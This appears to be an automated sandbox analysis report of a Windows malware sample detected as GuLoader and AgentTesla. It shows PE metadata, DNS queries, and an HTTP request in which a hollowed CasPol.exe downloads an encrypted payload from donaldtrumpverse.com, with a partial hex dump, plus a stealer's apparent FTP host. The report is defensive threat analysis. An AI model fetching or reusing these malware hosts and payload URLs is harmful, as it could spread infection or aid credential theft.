                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x68970x6a00False0.666126179245data6.45839821493IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rdata0x80000x14a60x1600False0.439275568182data5.02410928126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0xa0000x2b0180x600False0.521484375data4.15458210409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .ndata0x360000x360000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .rsrc0x6c0000x284980x28600False0.447235390867data5.43623310188IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountry
                        RT_ICON0x6c3580x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                        RT_ICON0x7cb800x94a8dataEnglishUnited States
                        RT_ICON0x860280x5488dataEnglishUnited States
                        RT_ICON0x8b4b00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 65279, next used block 4294967040EnglishUnited States
                        RT_ICON0x8f6d80x25a8dataEnglishUnited States
                        RT_ICON0x91c800x10a8dataEnglishUnited States
                        RT_ICON0x92d280x988dataEnglishUnited States
                        RT_ICON0x936b00x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_DIALOG0x93b180x100dataEnglishUnited States
                        RT_DIALOG0x93c180x11cdataEnglishUnited States
                        RT_DIALOG0x93d380xc4dataEnglishUnited States
                        RT_DIALOG0x93e000x60dataEnglishUnited States
                        RT_GROUP_ICON0x93e600x76dataEnglishUnited States
                        RT_VERSION0x93ed80x27cdataEnglishUnited States
                        RT_MANIFEST0x941580x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                        DLLImport
                        ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                        SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                        ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                        COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                        USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                        GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                        KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                        DescriptionData
                        LegalCopyrightEuthanasiachromo202
                        FileVersion24.24.17
                        CompanyNameConciliato
                        LegalTrademarksLASHINGPREEXPOU
                        CommentsSubconceptflovse2
                        ProductNameRitha
                        FileDescriptionandenk
                        Translation0x0409 0x04b0
                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States
                        TimestampSource PortDest PortSource IPDest IP
                        May 27, 2022 21:11:34.457545042 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.581590891 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.581911087 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.582463026 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.706456900 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.707243919 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.707329035 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.707391977 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.707426071 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.707488060 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.707515001 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.707585096 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.707587957 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.707657099 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.707676888 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.707755089 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.707817078 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.707865000 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.707885981 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.707918882 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.707982063 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.708022118 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.708080053 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.708204031 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.831994057 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.832139969 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.832201958 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.832287073 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.832357883 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.832412958 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.832459927 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.832510948 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.832515001 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.832598925 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.832601070 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.832675934 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.832695961 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.832747936 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.832801104 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.832801104 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.832850933 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.832869053 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.832917929 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.832933903 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.832989931 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.832997084 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.833055973 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.833106041 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.833113909 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.833167076 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.833170891 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.833229065 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.833283901 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.833286047 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.833333969 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.833348036 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.833404064 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.833447933 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.833499908 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.833571911 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.957458019 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.957545042 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.957684994 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.957781076 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.957817078 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.957885027 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.957921982 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.958045006 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.958084106 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.958137989 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.958192110 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.958194971 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.958259106 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.958307981 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.958312035 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.958354950 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.958378077 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.958436966 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.958479881 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.958523989 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.958539963 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.958607912 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.958620071 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.958683014 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.958683968 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.958745003 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.958791018 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.958796978 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.958844900 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.958858013 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.958908081 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.958918095 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.958995104 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.959007978 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.959064960 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.959115028 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.959120989 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.959178925 CEST8049727103.211.219.10192.168.11.20
                        May 27, 2022 21:11:34.959187984 CEST4972780192.168.11.20103.211.219.10
                        May 27, 2022 21:11:34.959240913 CEST4972780192.168.11.20103.211.219.10
                        TimestampSource PortDest PortSource IPDest IP
                        May 27, 2022 21:11:34.431529999 CEST5854553192.168.11.201.1.1.1
                        May 27, 2022 21:11:34.445573092 CEST53585451.1.1.1192.168.11.20
                        May 27, 2022 21:11:47.486834049 CEST5904853192.168.11.201.1.1.1
                        May 27, 2022 21:11:48.490408897 CEST5904853192.168.11.209.9.9.9
                        May 27, 2022 21:11:48.493509054 CEST53590489.9.9.9192.168.11.20
                        May 27, 2022 21:11:48.605619907 CEST53590481.1.1.1192.168.11.20
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        May 27, 2022 21:11:34.431529999 CEST192.168.11.201.1.1.10x7fdStandard query (0)donaldtrumpverse.comA (IP address)IN (0x0001)
                        May 27, 2022 21:11:47.486834049 CEST192.168.11.201.1.1.10xaacStandard query (0)ftp.solucionest.com.arA (IP address)IN (0x0001)
                        May 27, 2022 21:11:48.490408897 CEST192.168.11.209.9.9.90xaacStandard query (0)ftp.solucionest.com.arA (IP address)IN (0x0001)
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        May 27, 2022 21:11:02.352399111 CEST1.1.1.1192.168.11.200xd8c5No error (0)www-bing-com.dual-a-0001.a-msedge.netdual-a-0001.a-msedge.netCNAME (Canonical name)IN (0x0001)
                        May 27, 2022 21:11:02.352399111 CEST1.1.1.1192.168.11.200xd8c5No error (0)dual-a-0001.a-msedge.net13.107.21.200A (IP address)IN (0x0001)
                        May 27, 2022 21:11:02.352399111 CEST1.1.1.1192.168.11.200xd8c5No error (0)dual-a-0001.a-msedge.net204.79.197.200A (IP address)IN (0x0001)
                        May 27, 2022 21:11:02.671204090 CEST1.1.1.1192.168.11.200x5fd3No error (0)devcenterapi.azure-api.netapimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                        May 27, 2022 21:11:02.671204090 CEST1.1.1.1192.168.11.200x5fd3No error (0)devcenterapi-eastus-01.regional.azure-api.netapimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.netCNAME (Canonical name)IN (0x0001)
                        May 27, 2022 21:11:03.301928043 CEST1.1.1.1192.168.11.200xb5ceNo error (0)evoke-windowsservices-tas-msedge-net.e-0009.e-msedge.nete-0009.e-msedge.netCNAME (Canonical name)IN (0x0001)
                        May 27, 2022 21:11:03.301928043 CEST1.1.1.1192.168.11.200xb5ceNo error (0)e-0009.e-msedge.net13.107.5.88A (IP address)IN (0x0001)
                        May 27, 2022 21:11:34.445573092 CEST1.1.1.1192.168.11.200x7fdNo error (0)donaldtrumpverse.com103.211.219.10A (IP address)IN (0x0001)
                        May 27, 2022 21:11:48.493509054 CEST9.9.9.9192.168.11.200xaacName error (3)ftp.solucionest.com.arnonenoneA (IP address)IN (0x0001)
                        May 27, 2022 21:11:48.605619907 CEST1.1.1.1192.168.11.200xaacNo error (0)ftp.solucionest.com.arsolucionest.com.arCNAME (Canonical name)IN (0x0001)
                        May 27, 2022 21:11:48.605619907 CEST1.1.1.1192.168.11.200xaacNo error (0)solucionest.com.ar192.185.112.181A (IP address)IN (0x0001)
                        • donaldtrumpverse.com
                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.11.2049727103.211.219.1080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                        TimestampkBytes transferredDirectionData
                        May 27, 2022 21:11:34.582463026 CEST343OUTGET /kO4_tiMHM116.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                        Host: donaldtrumpverse.com
                        Cache-Control: no-cache
                        May 27, 2022 21:11:34.707243919 CEST344INHTTP/1.1 200 OK
                        Date: Fri, 27 May 2022 19:11:33 GMT
                        Server: Apache
                        Last-Modified: Fri, 27 May 2022 10:52:14 GMT
                        Accept-Ranges: bytes
                        Content-Length: 214592
                        Content-Type: application/octet-stream
                        Data Raw: 31 0c 0a 3d ff a2 66 24 b5 a5 1f 7b e8 56 53 c1 8c 5a 7b c7 a7 4e d8 e3 51 54 b9 54 56 0f a3 aa b4 fb 05 b0 87 c4 bf c1 35 2c 43 0a 99 90 07 d5 54 a9 f7 19 2a 8e c8 06 f0 52 da 55 56 05 e9 ed 17 b4 39 d9 4a f7 8b c1 8d f9 0a e9 8e 1e 72 4f 97 8b fa 95 e0 31 12 8f dc d3 7a 4c 70 68 49 8a 98 b3 7a d1 92 34 54 6f c3 81 f6 f9 3b d5 84 11 b7 3c 66 7b 59 a0 7d 3b 1d 0c 0b 27 f4 7c a9 43 57 b4 5c aa d7 11 ed c4 c2 ad 58 7f b5 c2 72 0c 67 08 46 5e b8 fe 7e 49 f8 80 55 be bc 89 a4 67 92 91 ca 48 1b 84 21 d4 95 aa 43 db a9 28 29 32 6a 86 44 4b b0 39 de ba e5 90 d5 7d c9 b3 e6 4a a1 88 01 99 82 43 0f 56 4c 49 20 cf 6b 71 a5 89 aa 19 8f 88 b2 07 73 8f 95 2f 24 28 db 5b 56 c6 c7 29 9e e9 18 58 f2 63 4a ab d0 7c 29 68 cd 85 30 25 24 06 31 8b e3 bd 74 3b 86 b1 fc c1 82 61 de 69 be 11 00 a6 ef 6e f5 eb 5d fd 64 d6 b4 cb 9f 7c 89 60 b3 ae 92 17 04 f6 4c eb 4b 2b 90 a1 68 92 3b da 92 3b a1 cf b7 50 0c 39 55 4e a6 cb 51 94 01 c3 d7 27 0a 75 18 de 8a c9 bb e4 7c 82 ff e5 ec 1f 19 73 d4 28 0f e0 71 00 ca 8a 3d 0e c5 54 e2 73 8f 4e 86 4d 06 85 d6 9f e5 b7 d0 45 42 fd 81 23 4c 71 72 64 dd 0d f1 dd e4 b4 ed 92 db 7c 87 b4 7b 77 04 95 d2 95 5c 32 90 ca 00 ae 02 ec 01 2d f6 29 51 80 ec a3 d6 c9 b7 b3 cd 97 79 78 b7 e8 5c 37 64 65 21 5a 28 59 7e 7c b6 9a 32 64 5b 81 a9 d3 e3 4b 1c d1 9e bf d8 c8 bc 31 3b 9b d1 c0 06 3b 82 fb 00 38 7f 06 a2 5c 35 31 a0 60 51 10 0e b9 50 3f 0c 00 b5 b3 78 9f e4 40 da 72 93 81 f1 c1 db 46 e9 55 01 de b7 57 93 82 1b 08 1b dc 78 13 3c 93 02 31 ed c3 62 ca f5 2a ce 80 25 f6 29 74 09 d6 5d cd 55 21 b2 2c 6a f3 6d e6 35 6a bd 70 f0 48 51 71 13 ed b1 d9 f7 41 a2 1d 6e b9 81 ce 89 7b 4b 6d 58 64 cb 0a 3d 7e 09 66 a3 ad ee fd 96 24 fe 8b 95 24 6b 12 36 85 28 9d bf 8f 19 17 10 bb 00 07 2a 84 e2 dc e9 63 32 4e 54 d4 81 10 dc a2 a4 31 8b 8a 2b 58 0e 0d 71 66 3e eb 44 4f fe e3 79 60 e9 1b 59 0d ac c0 c0 b0 2d cc 3c 20 be f3 9c 61 5e 15 45 66 23 7e 46 37 41 14 5c e9 d5 e6 2f 97 30 0f e1 bb a7 41 bb b0 26 58 15 45 3e 50 95 98 bf c7 32 dc 72 f6 98 8e 60 ba c8 31 9d 37 27 90 09 89 a4 01 ec 8a 4d 19 1b fe a2 4c 17 a3 65 26 b3 cf 0e 12 82 aa 18 db 09 37 3e 6c e9 e5 65 a0 82 2c 25 23 93 80 51 3d 19 e4 6a 00 ce 50 c1 4b e2 de 28 d7 a9 29 d6 3f 40 f1 b8 38 e3 c7 53 03 94 b0 d8 44 66 b4 38 93 9d bd 51 02 16 27 5d e5 5c d8 b4 e6 a8 11 d6 95 93 c7 ca 37 7f a9 c4 d0 5e 2c 7e 72 7c b0 c8 2b b8 75 b5 35 e0 5f c0 59 b1 f7 22 03 d5 c5 b4 ed b9 f5 cc 27 a2 e0 21 56 f2 98 46 cd 71 78 fb 76 71 89 81 62 7c cf ce a2 92 48 c0 ef 4b f7 8f 46 ad 71 dc 98 46 21 83 aa 20 76 30 45 72 6a 05 22 64 28 0b 03 71 9b c6 32 4e 17 a9 06 fd f4 f4 5e ad b9 39 5a e9 bf 27 48 db 89 d6 82 f9 0d f1 8f e0 5e 4d 04 89 d1 76 9e 32 12 8f 98 bc 76 4c 70 62 63 99 a8 b1 7a fd 92 34 54 6b c3 81 e7 ef 30 fe 9f 11 b0 2b 98 7a 75 a2 65 30 1d 0b 1d d9 75 50 ab 54 52 ab e1 bc 29 a4 c8 0b c8 17 72 d0 06 e7 26 64 0a 14 6b 2e ca 9b 33 28 a9 ef 75 f3 dd e7 ca 0d e6 b1 b9 3b 30 dd 4f ba b2 d4 d3 fa c1 65 62 19 07 ee 36 d0 9f 18 d1 a7 ca 90 d2 65 37 b2 ca 48 da cf 2a 7a cc 41 24 47 00 38 ab 85 79 71 a5 83 80 19 8f 9b 62 05 71 a6 9e 2e 2f 2e db 67 44 d0 cc 0a 85 e9 1f 4f 0c 62 88 f2 cb 77 29 4f db 7b 31 09 26 11 3a 8b a4 a5 8a 1a aa b3 d7 c1 a9 82 d8 41 ad 11 00 ac c5 7d c1 e9 5d d1 64 d6 b4 cc 9f dc 9b 76 b8 87 89 17 03 e1 b2 ea 65 29 c8 2f 68 95 3d 24 93 07 a3 d8 bc 50 1b 21 ab 5f 8a c9 7a 96 2a 20 17 22 0a 75 1a f6 9e c9 bb ee 56 91 5b bc ef 37 4e 73 d4 20 0f 80 63 16 f1 a4 26 0e c2 43 1c 72 a3 4c 9e 46 06
                        Data Ascii: 1=f${VSZ{NQTTV5,CT*RUV9JrO1zLphIz4To;<f{Y};'|CW\XrgF^~IUgH!C()2jDK9}JCVLI kqs/$([V)XcJ|)h0%$1t;ain]d|`LK+h;;P9UNQ'u|s(q=TsNMEB#Lqrd|{w\2-)Qyx\7de!Z(Y~|2d[K1;;8\51`QP?x@rFUWx<1b*%)t]U!,jm5jpHQqAn{KmXd=~f$$k6(*c2NT1+Xqf>DOy`Y-< a^Ef#~F7A\/0A&XE>P2r`17'MLe&7>le,%#Q=jPK()?@8SDf8Q']\7^,~r|+u5_Y"'!VFqxvqb|HKFqF! v0Erj"d(q2N^9Z'H^Mv2vLpbcz4Tk0+zue0uPTR)r&dk.3(u;0Oeb6e7H*zA$G8yqbq./.gDObw)O{1&:A}]dve)/h=$P!_z* "uV[7Ns c&CrLF


                        Click to jump to process

                        Target ID:0
                        Start time:21:11:07
                        Start date:27/05/2022
                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe"
                        Imagebase:0x400000
                        File size:1007819 bytes
                        MD5 hash:77436B29832DED92B60491EA36018196
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.945527558.0000000002B00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low

                        Target ID:3
                        Start time:21:11:22
                        Start date:27/05/2022
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe"
                        Imagebase:0x280000
                        File size:108664 bytes
                        MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        Target ID:4
                        Start time:21:11:23
                        Start date:27/05/2022
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe"
                        Imagebase:0xa80000
                        File size:108664 bytes
                        MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.813096057.0000000000F00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:moderate

                        Target ID:5
                        Start time:21:11:23
                        Start date:27/05/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7fba80000
                        File size:875008 bytes
                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        No disassembly